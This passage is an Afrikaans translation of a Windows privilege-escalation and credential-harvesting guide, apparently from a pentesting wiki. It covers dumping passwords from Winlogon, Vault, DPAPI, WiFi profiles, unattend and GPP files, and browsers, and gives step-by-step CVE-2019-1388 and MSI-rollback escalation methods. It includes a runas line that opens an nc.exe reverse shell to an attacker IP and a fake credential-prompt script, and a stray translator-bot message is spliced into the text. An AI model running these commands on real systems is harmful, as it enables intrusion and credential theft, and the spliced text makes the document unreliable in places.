C:\Windows\System32\wsl.exe

Die binêre bash.exe kan ook gevind word in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

As jy root user kry, kan jy op enige poort luister (die eerste keer dat jy nc.exe gebruik om op ’n poort te luister, sal dit via die GUI vra of nc deur die firewall toegelaat moet word).

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

Om maklik bash as root te begin, kan jy probeer --default-user root

Jy kan die WSL lêerstelsel verken in die gids C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Windows-aanmeldbewyse

Winlogon-aanmeldbewyse

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

Credentials manager / Windows vault

From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault\

Die Windows Vault stoor user credentials vir servers, websites en ander programme wat Windows kan log in the users automatically.

Op die eerste oogopslag lyk dit asof gebruikers hul Facebook credentials, Twitter credentials, Gmail credentials, ens. kan stoor sodat hulle outomaties via blaaiers aanmeld. Maar dit is nie so nie.

Windows Vault stores credentials that Windows can log in the users automatically, which means that any Windows application that needs credentials to access a resource (server or a website) can make use of this Credential Manager & Windows Vault and use the credentials supplied instead of users entering the username and password all the time.

Tensy die toepassings met Credential Manager interaksie het, dink ek nie dit is moontlik dat hulle die credentials vir ’n gegewe resource kan gebruik nie. Dus, as jou toepassing die vault wil gebruik, behoort dit op een of ander manier communicate with the credential manager and request the credentials for that resource from the default storage vault.

Gebruik die cmdkey om die gestoorde credentials op die masjien te lys.

cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

Dan kan jy runas met die /savecred-opsies gebruik om die gestoorde kredensiale te gebruik. Die volgende voorbeeld roep ’n afgeleë binary via ’n SMB share aan.

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

Gebruik van runas met ’n verskafde stel credentials.

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Let wel dat mimikatz, lazagne, credentialfileview, VaultPasswordView, of van die Empire Powershells module.

DPAPI

Die Data Protection API (DPAPI) verskaf ’n metode vir symmetriese enkripsie van data, hoofsaaklik in die Windows-bedryfstelsel gebruik vir die symmetriese enkripsie van asymmetriese private sleutels. Hierdie enkripsie maak gebruik van ’n gebruiker- of stelselgeheim wat beduidend tot die entropie bydra.

DPAPI maak die enkripsie van sleutels moontlik deur ’n symmetriese sleutel wat afgelei is van die gebruiker se aanmeldgeheime. In scenario’s met stelsel-enkripsie gebruik dit die stelsel se domein-authentiseringsgeheime.

Gekodeerde gebruikers-RSA-sleutels wat DPAPI gebruik, word gestoor in die %APPDATA%\Microsoft\Protect{SID} directory, waar {SID} die gebruiker se Security Identifier verteenwoordig. Die DPAPI-sleutel, wat in dieselfde lêer as die master-sleutel wat die gebruiker se private sleutels beskerm, saamgehou word, bestaan gewoonlik uit 64 bytes ewekansige data. (Dit is belangrik om op te let dat toegang tot hierdie gids beperk is, en dat die inhoud nie met die dir-opdrag in CMD opgesom kan word nie, alhoewel dit wel met PowerShell gelys kan word.)

Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\

Jy kan die mimikatz module dpapi::masterkey met die toepaslike argumente (/pvk of /rpc) gebruik om dit te ontsleutel.

Die credentials files protected by the master password is gewoonlik geleë in:

dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Jy kan die mimikatz module dpapi::cred met die toepaslike /masterkey gebruik om te ontsleutel.
Jy kan extract many DPAPI masterkeys from memory met die sekurlsa::dpapi module (as jy root is).

DPAPI - Extracting Passwords

PowerShell Credentials

PowerShell credentials word dikwels gebruik vir scripting en automation-take as ’n manier om enkripteerde credentials gerieflik te stoor. Die credentials word beskerm met DPAPI, wat gewoonlik beteken dat slegs dieselfde gebruiker op dieselfde rekenaar waarop dit geskep is, dit kan ontsleutel.

Om decrypt ’n PS credentials uit die lêer wat dit bevat te kan jy:

PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username

john

PS C:\htb> $credential.GetNetworkCredential().password

JustAPWD!

Wifi

#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*

Gestoorde RDP-verbindinge

Jy kan hulle vind by HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
en in HKCU\Software\Microsoft\Terminal Server Client\Servers\

Onlangs Uitgevoerde Opdragte

HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Remote Desktop Kredensiële Bestuurder

%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings

Gebruik die Mimikatz dpapi::rdg module met die toepaslike /masterkey om enige .rdg-lêers te dekripteer
Jy kan veel DPAPI masterkeys uit geheue onttrek met die Mimikatz sekurlsa::dpapi module

Sticky Notes

Mense gebruik dikwels die StickyNotes-app op Windows-werkstasies om wagwoorde te stoor en ander inligting, sonder om te besef dat dit ’n databasislêer is. Hierdie lêer is geleë by C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite en is dit altyd die moeite werd om na te soek en te ondersoek.

AppCmd.exe

Let wel: om wagwoorde uit AppCmd.exe te herstel moet jy Administrator wees en dit onder ’n High Integrity level uitvoer.
AppCmd.exe is geleë in die %systemroot%\system32\inetsrv\ directory.
As hierdie lêer bestaan, is dit moontlik dat sekere credentials gekonfigureer is en herwin kan word.

Hierdie kode is onttrek uit PowerUP:

function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"

# Check if appcmd.exe exists
if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable

# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")

# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {

# Get application pool name
$PoolName = $_

# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd

# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd

# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}

# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {

# Get Virtual Directory Name
$VdirName = $_

# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd

# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd

# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}

# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}

SCClient / SCCM

Kontroleer of C:\Windows\CCM\SCClient.exe bestaan .
Installers word met SYSTEM privileges uitgevoer, baie is kwesbaar vir DLL Sideloading (Inligting van https://github.com/enjoiz/Privesc).

$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }

Lêers en Registry (Credentials)

Putty Creds

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

Putty SSH Host-sleutels

reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\

SSH-sleutels in die register

SSH private keys kan binne die registersleutel HKCU\Software\OpenSSH\Agent\Keys gestoor word, dus behoort jy te kyk of daar iets interessant daarin is:

reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'

As jy enige inskrywing binne daardie pad vind, sal dit waarskynlik ’n gestoorde SSH key wees. Dit is versleuteld gestoor maar kan maklik gedekripteer word met behulp van https://github.com/ropnop/windows_sshagent_extract.
Meer inligting oor hierdie tegniek hier: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/

As die ssh-agent service nie loop nie en jy wil hê dit moet outomaties by opstart begin, voer die volgende uit:

Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service

Tip

Dit lyk asof hierdie tegniek nie meer geldig is nie. Ek het probeer om ’n paar ssh-sleutels te skep, hulle met ssh-add by te voeg en via ssh by ’n masjien aan te meld. Die register HKCU\Software\OpenSSH\Agent\Keys bestaan nie en procmon het nie die gebruik van dpapi.dll tydens die asymmetriese sleutel-outentisering geïdentifiseer nie.

Onbewaakte lêers

C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Jy kan ook na hierdie lêers soek met metasploit: post/windows/gather/enum_unattend

Voorbeeldinhoud:

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>

<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>

SAM & SYSTEM rugsteun

# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Cloud Credentials

#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json

McAfee SiteList.xml

Soek na ’n lêer genaamd SiteList.xml

Gecachte GPP-wagwoord

Daar was vroeër ’n funksie beskikbaar wat die uitrol van maatgemaakte plaaslike administratorrekeninge op ’n groep masjiene via Group Policy Preferences (GPP) toegelaat het. Hierdie metode het egter beduidende sekuriteitsfoute gehad. Eerstens kon die Group Policy Objects (GPOs), gestoor as XML-lêers in SYSVOL, deur enige domeingebruiker bereik word. Tweedens kon die wagwoorde binne hierdie GPPs, versleuteld met AES256 met ’n publiek gedokumenteerde standaard sleutel, deur enige geverifieerde gebruiker ontsleutel word. Dit het ’n ernstige risiko voorgestel, aangesien dit gebruikers sou kon toelaat om verhewe regte te bekom.

Om hierdie risiko te beperk, is ’n funksie ontwikkel om plaaslik gecachte GPP-lêers te skandeer wat ’n “cpassword”-veld bevat wat nie leeg is nie. Wanneer so ’n lêer gevind word, ontsleutel die funksie die wagwoord en gee ’n pasgemaakte PowerShell-objek terug. Hierdie objek sluit besonderhede oor die GPP en die lêer se ligging in, wat help om hierdie sekuriteitskwessie te identifiseer en reg te stel.

Soek in C:\ProgramData\Microsoft\Group Policy\history of in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (previous to W Vista) vir hierdie lêers:

• Groups.xml
• Services.xml
• Scheduledtasks.xml
• DataSources.xml
• Printers.xml
• Drives.xml

Om die cPassword te ontsleutel:

#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

Gebruik crackmapexec om die passwords te kry:

crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin

IIS Web-konfigurasie

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Voorbeeld van web.config met credentials:

<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>

OpenVPN aanmeldbewyse

Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}

foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]

$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)

Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}

Loglêers

# IIS
C:\inetpub\logs\LogFiles\*

#Apache
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

Vra vir credentials

Jy kan altyd die gebruiker vra om sy credentials of selfs die credentials van ’n ander gebruiker in te voer as jy dink hy dit kan weet (let wel dat om die kliënt direk te vra vir die credentials regtig riskant is):

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password

#Get plaintext
$cred.GetNetworkCredential() | fl

Moontlike lêernamme wat credentials bevat

Bekende lêers wat ’n tyd gelede passwords in clear-text of Base64 bevat het

$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db         #Firefox
key4.db         #Firefox
places.sqlite   #Firefox
"Login Data"    #Chrome
Cookies         #Chrome
Bookmarks       #Chrome
History         #Chrome
TypedURLsTime   #IE
TypedURLs       #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

I don’t have access to your repository. Please paste the contents of src/windows-hardening/windows-local-privilege-escalation/README.md (or upload the file) and I’ll translate the relevant English text to Afrikaans, preserving all markdown/html/tags and paths as requested.

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"

Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

Aanmeldbewyse in die RecycleBin

Jy moet ook die Bin nagaan vir aanmeldbewyse daarin

Om wagwoorde te herwin wat deur verskeie programme gestoor is, kan jy gebruik: http://www.nirsoft.net/password_recovery_tools.html

In die register

Ander moontlike registersleutels met aanmeldbewyse

reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"

Extract openssh keys from registry.

Blaaiergeskiedenis

Jy moet soek na dbs waar wagwoorde van Chrome or Firefox gestoor word.
Kyk ook na die geskiedenis, bladmerke en gunstelinge van die blaaiers, want dalk is sommige wagwoorde daar gestoor.

Gereedskap om wagwoorde uit blaaiers te onttrek:

• Mimikatz: dpapi::chrome
• SharpWeb
• SharpChromium
• SharpDPAPI

COM DLL Overwriting

Component Object Model (COM) is ’n tegnologie ingebou in die Windows operating system wat interkommunikasie tussen sagtewarekomponente in verskillende tale toelaat. Elke COM-komponent is identified via a class ID (CLSID) en elke komponent gee funksionaliteit bloot via een of meer interfaces, geïdentifiseer via interface IDs (IIDs).

COM klasse en interfaces word in die register gedefinieer onder HKEY\CLASSES\ROOT\CLSID en HKEY\CLASSES\ROOT\Interface onderskeidelik. Hierdie register word geskep deur die samestelling van HKEY\LOCAL\MACHINE\Software\Classes + HKEY\CURRENT\USER\Software\Classes = HKEY\CLASSES\ROOT.

Binne die CLSIDs van hierdie register vind jy die child registry InProcServer32 wat ’n default value bevat wat na ’n DLL wys en ’n waarde genaamd ThreadingModel wat Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) of Neutral (Thread Neutral) kan wees.

Basies, as jy enige van die DLLs wat uitgevoer gaan word kan overwrite, kan jy escalate privileges as daardie DLL deur ’n ander gebruiker uitgevoer gaan word.

Om te leer hoe aanvallers COM Hijacking as ’n persistence mechanism gebruik, kyk:

COM Hijacking

Generic Password search in files and registry

Search for file contents

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

Soek na ’n lêer met ’n bepaalde lêernaam

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Soek die register vir sleutelname en wagwoorde

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d

Gereedskap wat na passwords soek

MSF-Credentials Plugin is ’n msf plugin. Ek het hierdie plugin geskep om outomaties elke metasploit POST-module uit te voer wat na credentials soek binne die slagoffer.
Winpeas soek outomaties na alle lêers wat passwords bevat wat op hierdie bladsy genoem word.
Lazagne is nog ’n uitstekende tool om passwords uit ’n stelsel te onttrek.

Die tool SessionGopher soek na sessions, usernames en passwords van verskeie tools wat hierdie data in clear text stoor (PuTTY, WinSCP, FileZilla, SuperPuTTY, en RDP)

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Leaked Handlers

Stel jou voor dat ’n proses wat as SYSTEM loop ’n nuwe proses oopmaak (OpenProcess()) met volledige toegang. Dieselfde proses skep ook ’n nuwe proses (CreateProcess()) met lae voorregte maar wat al die oop handles van die hoofproses erf.
Dan, as jy volledige toegang tot die lae-voorregte proses het, kan jy die oop handle na die geprivilegieerde proses wat met OpenProcess() geskep is gryp en ’n shellcode injekteer.
Lees hierdie voorbeeld vir meer inligting oor hoe om hierdie kwetsbaarheid te vind en uit te buit.
Lees hierdie ander pos vir ’n meer volledige verduideliking oor hoe om meer oop handlers van prosesse en threads wat met verskillende vlakke van toestemmings geërf is te toets en misbruik (nie net volledige toegang nie).

Named Pipe Client Impersonation

Gedeelde geheue-segmente, verwys na as pipes, maak proseskommunikasie en data-oordrag moontlik.

Windows bied ’n funksie genaamd Named Pipes, wat onverwante prosesse toelaat om data te deel, selfs oor verskillende netwerke. Dit lyk soos ’n klient/bediener-argitektuur, met rolle gedefinieer as named pipe server en named pipe client.

Wanneer data deur ’n client deur ’n pipe gestuur word, het die server wat die pipe opgestel het die vermoë om die identiteit van die client aan te neem, mits dit die nodige SeImpersonate regte het. Om ’n geprivilegieerde proses wat via ’n pipe kommunikeer te identifiseer—en wat jy kan naboots—bied die geleentheid om hoër voorregte te kry deur die identiteit van daardie proses aan te neem sodra dit met die pipe wat jy opgestel het interaksie het. Vir instruksies oor hoe om so ’n aanval uit te voer, vind jy nuttige gidse hier en hier.

Die volgende hulpmiddel maak dit ook moontlik om ’n named pipe-kommunikasie af te luister met ’n tool soos burp: https://github.com/gabriel-sztejnworcel/pipe-intercept en hierdie hulpmiddel laat jou toe om al die pipes te lys en te sien om privescs te vind https://github.com/cyberark/PipeViewer

Divers

Lêeruitbreidings wat in Windows kode kan uitvoer

Kyk na die blad https://filesec.io/

Monitering van opdragreëls vir wagwoorde

Wanneer jy ’n shell as ’n gebruiker kry, kan daar geskeduleerde take of ander prosesse wees wat uitgevoer word wat credentials op die opdragreël deurgee. Die skrip hieronder vang proses-opdragreëls elke twee sekondes en vergelyk die huidige toestand met die vorige toestand, en gee enige verskille uit.

while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}

Wagwoorde uit prosesse steel

Van ’n gebruiker met lae regte na NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass

As jy toegang het tot die grafiese koppelvlak (via console of RDP) en UAC is geaktiveer, is dit in sommige weergawes van Microsoft Windows moontlik om ’n terminal of enige ander proses soos “NT\AUTHORITY SYSTEM” vanaf ’n ongeprivilegieerde gebruiker te laat loop.

Dit maak dit moontlik om bevoegdhede op te skaal en UAC terselfdertyd met dieselfde kwesbaarheid te omseil. Daarbenewens is daar geen behoefte om enigiets te installeer nie en die binaire wat tydens die proses gebruik word, is onderteken en uitgereik deur Microsoft.

Sommige van die geraakte stelsels is die volgende:

SERVER
======

Windows 2008r2	7601	** link OPENED AS SYSTEM **
Windows 2012r2	9600	** link OPENED AS SYSTEM **
Windows 2016	14393	** link OPENED AS SYSTEM **
Windows 2019	17763	link NOT opened


WORKSTATION
===========

Windows 7 SP1	7601	** link OPENED AS SYSTEM **
Windows 8		9200	** link OPENED AS SYSTEM **
Windows 8.1		9600	** link OPENED AS SYSTEM **
Windows 10 1511	10240	** link OPENED AS SYSTEM **
Windows 10 1607	14393	** link OPENED AS SYSTEM **
Windows 10 1703	15063	link NOT opened
Windows 10 1709	16299	link NOT opened

Om hierdie vulnerability te exploit, is dit nodig om die volgende stappe uit te voer:

1) Right click on the HHUPD.EXE file and run it as Administrator.

2) When the UAC prompt appears, select "Show more details".

3) Click "Show publisher certificate information".

4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.

5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.

6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.

7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.

8) Remember to cancel setup and the UAC prompt to return to your desktop.

Van Administrator Medium na High Integriteitsvlak / UAC Bypass

Lees dit om meer te leer oor Integriteitsvlakke:

Integrity Levels

Lees dan dit om meer te leer oor UAC en UAC-bypasses:

UAC - User Account Control

From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP

Die tegniek beskryf in hierdie blogpost met ’n exploit code available here.

Die aanval bestaan basies uit die misbruik van die Windows Installer se rollback-funksie om geldige lêers tydens die uninstall-proses met kwaadaardige te vervang. Hiervoor moet die aanvaller ’n kwaadaardige MSI installer skep wat gebruik sal word om die C:\Config.Msi vouer te kap, wat later deur die Windows Installer gebruik sal word om rollback-lêers tydens die uninstall van ander MSI-pakkette te stoor, waar die rollback-lêers gewysig sou wees om die kwaadwillige payload te bevat.

Die saamgevatte tegniek is die volgende:

1. Stage 1 – Preparing for the Hijack (leave C:\Config.Msi empty)

• Stap 1: Installeer die MSI

• Skep ’n .msi wat ’n onskadelike lêer installeer (bv. dummy.txt) in ’n skryfbare gids (TARGETDIR).

• Merk die installer as “UAC Compliant”, sodat ’n non-admin user dit kan uitvoer.

• Hou ’n handle oop na die lêer nadat dit geïnstalleer is.

• Stap 2: Begin Uninstall

• Uninstall dieselfde .msi.

• Die uninstall-proses begin lêers na C:\Config.Msi skuif en hernoem hulle na .rbf lêers (rollback backups).

• Poll die open file handle met GetFinalPathNameByHandle om te detect wanneer die lêer C:\Config.Msi\<random>.rbf word.

• Stap 3: Custom Syncing

• Die .msi sluit ’n custom uninstall action (SyncOnRbfWritten) in wat:

• Sein wanneer .rbf geskryf is.

• Dan wag op ’n ander event voordat die uninstall voortgaan.

• Stap 4: Block Deletion of .rbf

• Wanneer gesignaleer, open die .rbf lêer sonder FILE_SHARE_DELETE — dit voorkom dat dit uitgevee word.

• Daarna signaleer terug sodat die uninstall kan eindig.

• Windows Installer kan nie die .rbf verwyder nie, en omdat dit nie al die inhoud kan verwyder nie, word C:\Config.Msi nie verwyder nie.

• Stap 5: Manually Delete .rbf

• Jy (aanvaller) vee die .rbf lêer handmatig uit.

• Nou is C:\Config.Msi leeg, gereed om gekaap te word.

Op hierdie punt, trigger die SYSTEM-level arbitrary folder delete vulnerability om C:\Config.Msi te verwyder.

2. Stage 2 – Replacing Rollback Scripts with Malicious Ones

• Stap 6: Recreate C:\Config.Msi with Weak ACLs

• Hernu die C:\Config.Msi vouer self.

• Stel swak DACLs in (bv. Everyone:F), en hou ’n handle oop met WRITE_DAC.

• Stap 7: Run Another Install

• Installeer die .msi weer, met:

• TARGETDIR: Skryfbare plek.

• ERROROUT: ’n veranderlike wat ’n geforseerde mislukking veroorsaak.

